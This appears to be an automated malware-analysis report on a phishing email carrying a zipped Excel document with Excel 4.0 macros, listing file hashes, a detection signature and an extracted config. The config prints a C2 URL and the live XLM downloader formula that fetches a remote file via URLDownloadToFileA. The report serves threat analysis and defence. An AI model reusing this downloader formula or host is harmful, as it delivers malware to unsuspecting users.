General

  • Target

    message__A9E01E9854ADB407C4B191065D99E304B19ECE92_unknown_.eml

  • Size

    18KB

  • MD5

    8a970816192957352df0217bcdb36d4a

  • SHA1

    48efc7f8f4f610f4fb7fde597eb026f6d451284d

  • SHA256

    6256f4c5ab30074d0e4e26eae4b1feeba98c42f4d3f71b8eb0e86e4990004b3d

  • SHA512

    bb979e46337ccede084ce639922c8cbef9c2c9819a6c090c660fb7abda6875a08b09c056d67e3ef18c4241e1b2c57e3cfd2d2465d87905eca0787078a6635ef4

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://ywgiu10zmnwcx03vpnyp.com/inda.xls

Attributes
  • formulas

    =CALL("URLMon","URLDownloadToFileA","JJCCBB",0,"http://ywgiu10zmnwcx03vpnyp.com/inda.xls","..\fkruf.djr",0)

Signatures

  • Suspicious Office macro (1 IoC)

    Office document equipped with 4.0 macros.

Files

  • message__A9E01E9854ADB407C4B191065D99E304B19ECE92_unknown_.eml
    .eml
  • collected (73).zip
    .zip
  • document-87247454.xls
    .xls windows office2003
  • email-plain-1.txt